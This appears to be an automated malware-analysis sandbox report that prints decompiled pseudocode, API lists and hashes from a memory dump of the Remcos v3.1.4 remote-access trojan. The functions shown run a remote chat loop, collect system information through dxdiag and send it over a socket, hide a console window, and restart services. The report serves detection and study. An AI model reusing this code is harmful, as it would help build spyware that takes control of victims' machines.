                                            0x00445264
                                            0x0044527f
                                            0x00445284
                                            0x0044528a
                                            0x0044528c
                                            0x00445297
                                            0x00445297
                                            0x00000000
                                            0x0044528c
                                            0x004451e5
                                            0x004451ec
                                            0x004451ee
                                            0x00445225
                                            0x00445225
                                            0x0044522f
                                            0x00445232
                                            0x00445239
                                            0x00445239
                                            0x00445239
                                            0x00445245
                                            0x00000000
                                            0x00445245
                                            0x004451f0
                                            0x004451f4
                                            0x00000000
                                            0x00000000
                                            0x004451f6
                                            0x00445205
                                            0x0044520a
                                            0x0044520d
                                            0x0044520e
                                            0x00445211
                                            0x00445211
                                            0x00445218
                                            0x0044521a
                                            0x0044521d
                                            0x00445220
                                            0x00445223
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00445183
                                            0x00445188
                                            0x0044518b
                                            0x00445192
                                            0x00000000
                                            0x00445192
                                            0x0044515c
                                            0x00445161
                                            0x00445167
                                            0x00445169
                                            0x00000000
                                            0x0044516e

                                            APIs
                                              • Part of subcall function 00444DF8: CreateFileW.KERNEL32(00000000,00000000,?,004451D3,?,?,00000000,?,004451D3,00000000,0000000C), ref: 00444E15
                                            • GetLastError.KERNEL32 ref: 0044523E
                                            • __dosmaperr.LIBCMT ref: 00445245
                                            • GetFileType.KERNEL32(00000000), ref: 00445251
                                            • GetLastError.KERNEL32 ref: 0044525B
                                            • __dosmaperr.LIBCMT ref: 00445264
                                            • CloseHandle.KERNEL32(00000000), ref: 00445284
                                            • CloseHandle.KERNEL32(?), ref: 004453CE
                                            • GetLastError.KERNEL32 ref: 00445400
                                            • __dosmaperr.LIBCMT ref: 00445407
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                            • String ID: H
                                            • API String ID: 4237864984-2852464175
                                            • Opcode ID: f5ca7987d834b85ecd2362fd4b5719c9b0e45a934b29bd7ac812442fdb72d4b8
                                            • Instruction ID: 5e257f59bcc591f80180d9afd3ded7b4f1f708aa5c5ecc46827c886bfd8a7d26
                                            • Opcode Fuzzy Hash: f5ca7987d834b85ecd2362fd4b5719c9b0e45a934b29bd7ac812442fdb72d4b8
                                            • Instruction Fuzzy Hash: E5A14732A105448FEF199F68D8517AE7BA0AF0A324F14015FF8119F392D7799C02CB5A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402FD7, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 147windowmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E00402FD7(void* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t27;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t54;
				void* _t65;
				void* _t66;
				void* _t68;
				intOrPtr _t103;
				void* _t107;
				struct HWND__* _t110;
				signed int _t111;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t119 = __eflags;
				_t97 = __edx;
				_push(_t65);
				_t103 = _a4;
				E004020E6(_t65,  &_v104, __edx, __eflags, _t103 + 0x1c);
				SetEvent( *(_t103 + 0x34));
				_t27 = E00401F2E( &_v108);
				E00401F0C( &_v108,  &_v60, 4, 0xffffffff);
				_t114 = (_t111 & 0xfffffff8) - 0x5c;
				E004020E6(_t65, _t114, _t97, _t119, 0x46103c);
				_t115 = _t114 - 0x18;
				E004020E6(_t65, _t115, _t97, _t119,  &_v76);
				E00411260( &_v140, _t97);
				_t116 = _t115 + 0x30;
				_t107 =  *_t27 - 0x3a;
				if(_t107 == 0) {
					_t66 = E00407275(E00401F2E(E004031A1( &_v116, _t97, __eflags, 0)));
					__eflags = _t66;
					if(_t66 == 0) {
						L7:
						E004031CC( &_v116);
						E00401F97();
						E00401F97();
						__eflags = 0;
						return 0;
					}
					 *0x460a80 = E004072CB(_t66, "DisplayMessage");
					_t42 = E004072CB(_t66, "GetMessage");
					_t100 = "CloseChat";
					 *0x460a78 = _t42;
					_t43 = E004072CB(_t66, "CloseChat");
					_t117 = _t116 - 0x18;
					 *0x460a7c = _t43;
					 *0x460a62 = 1;
					E004020E6(_t66, _t117, "CloseChat", __eflags, 0x4610c8);
					_push(0x74);
					E00401790(_t66, _t103, "CloseChat", __eflags);
					L10:
					_t68 = HeapCreate(0, 0, 0);
					__eflags =  *0x460a78(_t68,  &_v140);
					if(__eflags != 0) {
						_t117 = _t117 - 0x18;
						E004020A5(_t68, _t117, _t100, __eflags, _v140, _t48);
						_push(0x3b);
						E00401790(_t68, _t103, _t100, __eflags);
						HeapFree(_t68, 0, _v176);
					}
					goto L10;
				}
				_t110 = _t107 - 1;
				_t121 = _t110;
				if(_t110 != 0) {
					goto L7;
				}
				_t54 =  *0x460a80(E00401F2E(E004031A1( &_v116, _t97, _t121, _t110)));
				_t122 = _t54;
				if(_t54 == 0) {
					goto L7;
				}
				E004031DB(_t65,  &_v80, 0x4554ac);
				E004111F2(_t65, _t116 - 0x18,  &_v84);
				_push(0x3b);
				E00401790(_t65, _t103,  &_v84, _t122);
				E004031D1();
				L4:
				while(GetMessageA( &_v52, _t110, _t110, _t110) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}
































                                            0x00402fd7
                                            0x00402fd7
                                            0x00402fe4
                                            0x00402fe7
                                            0x00402fee
                                            0x00402ff6
                                            0x00403000
                                            0x00403014
                                            0x00403019
                                            0x00403023
                                            0x00403028
                                            0x00403032
                                            0x0040303b
                                            0x00403040
                                            0x00403043
                                            0x00403046
                                            0x00403106
                                            0x00403108
                                            0x0040310a
                                            0x004030c8
                                            0x004030cc
                                            0x004030d5
                                            0x004030de
                                            0x004030e5
                                            0x004030eb
                                            0x004030eb
                                            0x0040311d
                                            0x00403124
                                            0x00403129
                                            0x0040312e
                                            0x00403135
                                            0x0040313a
                                            0x0040313d
                                            0x00403144
                                            0x00403150
                                            0x00403155
                                            0x00403159
                                            0x0040315e
                                            0x00403167
                                            0x00403177
                                            0x00403179
                                            0x0040317b
                                            0x00403185
                                            0x0040318a
                                            0x0040318e
                                            0x00403199
                                            0x00403199
                                            0x00000000
                                            0x00403179
                                            0x0040304c
                                            0x0040304c
                                            0x0040304f
                                            0x00000000
                                            0x00000000
                                            0x00403063
                                            0x0040306a
                                            0x0040306c
                                            0x00000000
                                            0x00000000
                                            0x00403077
                                            0x00403085
                                            0x0040308a
                                            0x0040308e
                                            0x00403097
                                            0x00000000
                                            0x0040309c
                                            0x004030b3
                                            0x004030be
                                            0x004030be
                                            0x004030c6
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • SetEvent.KERNEL32(?,?), ref: 00402FF6
                                            • GetMessageA.USER32 ref: 004030A4
                                            • TranslateMessage.USER32(?), ref: 004030B3
                                            • DispatchMessageA.USER32 ref: 004030BE
                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00403161
                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 00403199
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                            • API String ID: 2956720200-749203953
                                            • Opcode ID: a3a0a0ac8a2af4740997d285af799874a0c819712f7ffa3cfd5704965772f800
                                            • Instruction ID: fc15fe8099c8d1e0663c8d9032f9d3d6bf8b73e48a182ed419b3831280c75530
                                            • Opcode Fuzzy Hash: a3a0a0ac8a2af4740997d285af799874a0c819712f7ffa3cfd5704965772f800
                                            • Instruction Fuzzy Hash: 5241C531604701ABCA04FF71DC4A96F7BADAB85355F40493EF502A71E1EF789A08C79A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00411BB3, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 133COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E00411BB3(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v648;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t74;

				_t71 = __edx;
				_t74 = __ecx;
				_t53 = __edx;
				E00405BA4(__edx,  &_v32);
				_t36 = __edx + 0xffffffd0;
				_t76 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00411D6B))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							_t4 =  &_v56; // -50
							__ecx = _t4;
							__eax = E00410C16(__ebx, _t4);
							_t5 =  &_v32; // -26
							__ecx = _t5;
							__eax = E004053CE(_t5, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = E0041132E(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								_t14 =  &_v56; // -50
								__ecx = _t14;
								E004031DB(__ebx, __ecx, L"\\SysWOW64") = E00430F62(__ebx, __ecx, __eflags, L"WinDir");
								_t15 =  &_v80; // -74
								__ecx = _t15;
								__edx = __eax;
								_t16 =  &_v104; // -98
								__ecx = _t16;
								__eax = E0040846D(_t16, __edx, __eax);
								_t17 =  &_v32; // -26
								__ecx = _t17;
								__eax = E004053CE(_t17, __edx, __esi, __eax);
								_t18 =  &_v104; // -98
								__ecx = _t18;
								__eax = E004031D1();
								_t19 =  &_v80; // -74
								__ecx = _t19;
								__eax = E004031D1();
								L4:
								_t6 =  &_v56; // -50
								__ecx = _t6;
								goto L5;
							} else {
								_t7 =  &_v104; // -98
								__ecx = _t7;
								E004031DB(__ebx, __ecx, L"\\system32") = E00430F62(__ebx, __ecx, __eflags, L"WinDir");
								_t8 =  &_v80; // -74
								__ecx = _t8;
								__edx = __eax;
								_t9 =  &_v56; // -50
								__ecx = _t9;
								__eax = E0040846D(_t9, __edx, __eax);
								_t10 =  &_v32; // -26
								__ecx = _t10;
								__eax = E004053CE(_t10, __edx, __esi, __eax);
								_t11 =  &_v56; // -50
								__ecx = _t11;
								__eax = E004031D1();
								_t12 =  &_v80; // -74
								__ecx = _t12;
								__eax = E004031D1();
								_t13 =  &_v104; // -98
								__ecx = _t13;
								L5:
								__eax = E004031D1();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							_t51 = E00430F62(_t53, _t55, _t76);
							_t20 =  &_v32; // -26
							E00409BB0(_t53, _t20, _t51);
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(L00404090( &_v32),  &_v648, 0x208);
				_t39 = E004031DB(_t53,  &_v128, _a4);
				_t40 = E004031DB(_t53,  &_v56, "\\");
				E0040846D(_t74, E0040846D( &_v104, E00411EAC(_t53,  &_v80, _t71, _t76,  &_v648, _t38), _t40), _t39);
				E004031D1();
				E004031D1();
				E004031D1();
				E004031D1();
				E004031D1();
				return _t74;
				goto L16;
			}














                                            0x00411bb3
                                            0x00411bbf
                                            0x00411bc1
                                            0x00411bc6
                                            0x00411bce
                                            0x00411bd1
                                            0x00411bd4
                                            0x00411bda
                                            0x00000000
                                            0x00411be1
                                            0x00000000
                                            0x00000000
                                            0x00411beb
                                            0x00411beb
                                            0x00411bee
                                            0x00411bf4
                                            0x00411bf4
                                            0x00411bf7
                                            0x00000000
                                            0x00000000
                                            0x00411c09
                                            0x00000000
                                            0x00000000
                                            0x00411c13
                                            0x00000000
                                            0x00000000
                                            0x00411c1d
                                            0x00411c22
                                            0x00411c24
                                            0x00411c76
                                            0x00411c76
                                            0x00411c84
                                            0x00411c8b
                                            0x00411c8b
                                            0x00411c93
                                            0x00411c95
                                            0x00411c95
                                            0x00411c98
                                            0x00411c9f
                                            0x00411c9f
                                            0x00411ca2
                                            0x00411ca7
                                            0x00411ca7
                                            0x00411caa
                                            0x00411caf
                                            0x00411caf
                                            0x00411cb2
                                            0x00411bfc
                                            0x00411bfc
                                            0x00411bfc
                                            0x00000000
                                            0x00411c26
                                            0x00411c2b
                                            0x00411c2b
                                            0x00411c39
                                            0x00411c40
                                            0x00411c40
                                            0x00411c48
                                            0x00411c4a
                                            0x00411c4a
                                            0x00411c4d
                                            0x00411c54
                                            0x00411c54
                                            0x00411c57
                                            0x00411c5c
                                            0x00411c5c
                                            0x00411c5f
                                            0x00411c64
                                            0x00411c64
                                            0x00411c67
                                            0x00411c6c
                                            0x00411c6c
                                            0x00411bff
                                            0x00411bff
                                            0x00000000
                                            0x00411bff
                                            0x00000000
                                            0x00000000
                                            0x00411cbc
                                            0x00000000
                                            0x00000000
                                            0x00411cc3
                                            0x00000000
                                            0x00000000
                                            0x00411cca
                                            0x00411ccf
                                            0x00411ccf
                                            0x00411cd6
                                            0x00411cd9
                                            0x00000000
                                            0x00000000
                                            0x00411bda
                                            0x00411cde
                                            0x00411cf3
                                            0x00411d01
                                            0x00411d0f
                                            0x00411d34
                                            0x00411d3d
                                            0x00411d45
                                            0x00411d4d
                                            0x00411d55
                                            0x00411d5d
                                            0x00411d6a
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: LongNamePath
                                            • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                            • API String ID: 82841172-1609423294
                                            • Opcode ID: b1b27e6d239b569e06b5e388cdbb70882af2a8ffd93af9f556085b833dbfa076
                                            • Instruction ID: bd310b2f7c920ed5c014996bb8dda882b80ddb469da53a11d3e24687e9674b5a
                                            • Opcode Fuzzy Hash: b1b27e6d239b569e06b5e388cdbb70882af2a8ffd93af9f556085b833dbfa076
                                            • Instruction Fuzzy Hash: CE412331B04209AACB04FB61ED66DFE7778DE15305B60413FF912760D2EE7C2E498A99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040E0BE, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 112sleepfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E0040E0BE(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t97 = __eflags;
				E00406D5F(_t54,  &_v76, E004031DB(_t54,  &_v52, E00430F62(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
				E004031D1();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", L00404090(E0040852B( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				E004031D1();
				E004020CF(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = L00404090( &_v76);
					_t87 =  &_v28;
					E004116B9(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (E00409BB9() != 0 && _t92 < 0x4b0);
				if(E00409BB9() == 0) {
					DeleteFileW(L00404090( &_v76));
					E0040153A(_t55,  &_v180, 1);
					_t95 = _t94 - 0x10;
					_t93 = 0x460a68;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t46 = E004016F4(_t87);
					_t102 = _t46;
					if(_t46 != 0) {
						_t93 = _t95 - 0x18;
						E00404095(_t55, _t95 - 0x18, E004040B9( &_v52,  &_a4), _t102,  &_v180);
						E00401790(_t55,  &_v180, _t49, _t102, 0x97,  &_v28);
						E00401F97();
						E00401AF7( &_v180);
						_t55 = 1;
					}
					E00401B1B(_t55,  &_v180, _t93);
				}
				E00401F97();
				E004031D1();
				E00401F97();
				return _t55;
			}



















                                            0x0040e0be
                                            0x0040e0e8
                                            0x0040e0f1
                                            0x0040e0f6
                                            0x0040e11f
                                            0x0040e128
                                            0x0040e130
                                            0x0040e135
                                            0x0040e137
                                            0x0040e13a
                                            0x0040e13f
                                            0x0040e144
                                            0x0040e14b
                                            0x0040e154
                                            0x0040e15a
                                            0x0040e170
                                            0x0040e17f
                                            0x0040e18d
                                            0x0040e192
                                            0x0040e19d
                                            0x0040e1a2
                                            0x0040e1a3
                                            0x0040e1a4
                                            0x0040e1a5
                                            0x0040e1a6
                                            0x0040e1ab
                                            0x0040e1ad
                                            0x0040e1b5
                                            0x0040e1c9
                                            0x0040e1da
                                            0x0040e1e2
                                            0x0040e1ed
                                            0x0040e1f2
                                            0x0040e1f2
                                            0x0040e1fa
                                            0x0040e1fa
                                            0x0040e202
                                            0x0040e20a
                                            0x0040e212
                                            0x0040e21f

                                            APIs
                                              • Part of subcall function 0040852B: char_traits.LIBCPMT ref: 0040853B
                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0040E11F
                                              • Part of subcall function 004116B9: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,0046103C,00000000,00000000,00000000,?,0040E149), ref: 004116D6
                                            • Sleep.KERNEL32(00000064), ref: 0040E14B
                                            • DeleteFileW.KERNEL32(00000000), ref: 0040E17F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                            • String ID: /t $\sysinfo.txt$dxdiag$hF$open$temp
                                            • API String ID: 2701014334-4099430714
                                            • Opcode ID: 9669e6afdf357e66afaa3536fca32e69a6806dc77f6ae1d7ed9c9d63ae953a5c
                                            • Instruction ID: 2ba5311960a850e7bcf1047a60780667fd064abcd5f32f835c2f1bc120c12902
                                            • Opcode Fuzzy Hash: 9669e6afdf357e66afaa3536fca32e69a6806dc77f6ae1d7ed9c9d63ae953a5c
                                            • Instruction Fuzzy Hash: AA316271A102145ACB04FBA1DC52AEE7739AF55308F40017EFA06771D2EF782E49C659
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00412729, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 89memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 59%
                                            			E00412729(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void _t26;
				void _t28;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x4616fc(__ebx);
				 *0x460e24 = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E00433497(_t36, "CONOUT$", "a", E0042ED9F(1));
				E0042B710(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t22 =  *(_t47 + 1);
					_t47 = _t47 + 1;
				} while (_t22 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t24 =  *((intOrPtr*)(_t51 + 1));
					_t51 = _t51 + 1;
				} while (_t24 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t25 =  *((intOrPtr*)(_t53 + 1));
					_t53 = _t53 + 1;
				} while (_t25 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t55 =  &_v204 - 1;
				do {
					_t26 =  *(_t55 + 1);
					_t55 = _t55 + 1;
				} while (_t26 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t28 =  *(_t59 + 1);
					_t59 = _t59 + 1;
					_t85 = _t28;
				} while (_t28 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E00401404(_t85, _t30, 7);
			}




















                                            0x00412729
                                            0x00412733
                                            0x00412735
                                            0x0041273b
                                            0x00412743
                                            0x00412749
                                            0x0041274e
                                            0x0041274e
                                            0x00412755
                                            0x00412768
                                            0x0041277b
                                            0x00412789
                                            0x0041278a
                                            0x0041278a
                                            0x0041278d
                                            0x0041278e
                                            0x00412794
                                            0x0041279a
                                            0x004127a2
                                            0x004127a3
                                            0x004127a3
                                            0x004127a6
                                            0x004127a7
                                            0x004127b0
                                            0x004127b1
                                            0x004127b2
                                            0x004127b9
                                            0x004127ba
                                            0x004127ba
                                            0x004127bd
                                            0x004127be
                                            0x004127c7
                                            0x004127c8
                                            0x004127c9
                                            0x004127d0
                                            0x004127d1
                                            0x004127d1
                                            0x004127d4
                                            0x004127d5
                                            0x004127d9
                                            0x004127e1
                                            0x004127e3
                                            0x004127eb
                                            0x004127ec
                                            0x004127ec
                                            0x004127ef
                                            0x004127f0
                                            0x004127f0
                                            0x00412802
                                            0x00412805
                                            0x00412811

                                            APIs
                                            • AllocConsole.KERNEL32(00461270), ref: 00412735
                                            • GetConsoleWindow.KERNEL32 ref: 0041273B
                                            • ShowWindow.USER32(00000000,00000000), ref: 0041274E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleWindow$AllocShow
                                            • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.1.4 Light$CONOUT$
                                            • API String ID: 3461962499-3410245623
                                            • Opcode ID: 246e1c45d3413a10793ae4d6ca70fd1539cfbd9b51d850029b748affee0ecfc2
                                            • Instruction ID: 11f39acacd715b834bfd74e29b0b6911a13a83eb64f108ad975a568b4534ddb8
                                            • Opcode Fuzzy Hash: 246e1c45d3413a10793ae4d6ca70fd1539cfbd9b51d850029b748affee0ecfc2
                                            • Instruction Fuzzy Hash: A3212B3290861525DF10AF155C01FD7BB59EF52701F044293EC5CBB292DBE62D9E47AC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040AEC7, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 75COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E0040AEC7(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E004297F8( &_v12, 0);
				_t48 =  *0x4627f0;
				_v8 = _t48;
				_t51 = E004089F2(_a4, E0040891B(0x460120));
				if(_t51 != 0) {
					L5:
					E00429850( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = E00408B24(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E004087E1( &_v24);
							E0042B694( &_v24, 0x45da24);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x4627e4 -  *((intOrPtr*)(_t40 + 4));
							if( *0x4627e4 >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E00428B91(0x4627e4);
								__eflags =  *0x4627e4 - 0xffffffff;
								if( *0x4627e4 == 0xffffffff) {
									E0040B26D();
									E00428A31(__eflags, 0x448c0e);
									E00428B52(0x4627e4, 0x4627e4);
								}
							}
							return 0x4627e8;
						} else {
							_t51 = _v8;
							 *0x4627f0 = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E00429A09(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}










                                            0x0040aed4
                                            0x0040aed9
                                            0x0040aee4
                                            0x0040aef5
                                            0x0040aef9
                                            0x0040af2d
                                            0x0040af30
                                            0x0040af3c
                                            0x0040aefb
                                            0x0040aefd
                                            0x0040af11
                                            0x0040af14
                                            0x0040af40
                                            0x0040af4e
                                            0x0040af53
                                            0x0040af5a
                                            0x0040af61
                                            0x0040af67
                                            0x0040af69
                                            0x0040af70
                                            0x0040af75
                                            0x0040af7d
                                            0x0040af7f
                                            0x0040af89
                                            0x0040af8f
                                            0x0040af95
                                            0x0040af96
                                            0x0040af9c
                                            0x0040af16
                                            0x0040af16
                                            0x0040af1b
                                            0x0040af23
                                            0x0040af27
                                            0x00000000
                                            0x0040af2c
                                            0x0040aeff
                                            0x0040aeff
                                            0x00000000
                                            0x0040aeff
                                            0x0040aefd

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040AED4
                                            • int.LIBCPMT ref: 0040AEE7
                                              • Part of subcall function 0040891B: std::_Lockit::_Lockit.LIBCPMT ref: 0040892C
                                              • Part of subcall function 0040891B: std::_Lockit::~_Lockit.LIBCPMT ref: 00408946
                                            • std::locale::_Getfacet.LIBCPMT ref: 0040AEF0
                                            • std::_Facet_Register.LIBCPMT ref: 0040AF27
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040AF30
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040AF4E
                                            • __Init_thread_footer.LIBCMT ref: 0040AF8F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                            • String ID: 'F$'F
                                            • API String ID: 2409581025-916474014
                                            • Opcode ID: 8aa61e32151a22d2d2fa48258b7b52b315f187d642eee03bdd5dfa6c84f7435c
                                            • Instruction ID: ae3cc6f9a755a8d01a024ea928b82b72739661b5a3bba65f87bc3ab4480e8116
                                            • Opcode Fuzzy Hash: 8aa61e32151a22d2d2fa48258b7b52b315f187d642eee03bdd5dfa6c84f7435c
                                            • Instruction Fuzzy Hash: 2721F572A04615ABCB14EB69D941D9D73A8EF40324B60017FF441B72D1DF789D01879E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004103E4, Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E004103E4(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, L00404090( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				E004031D1();
				return _t22;
			}








                                            0x004103ef
                                            0x00410401
                                            0x00410410
                                            0x00410414
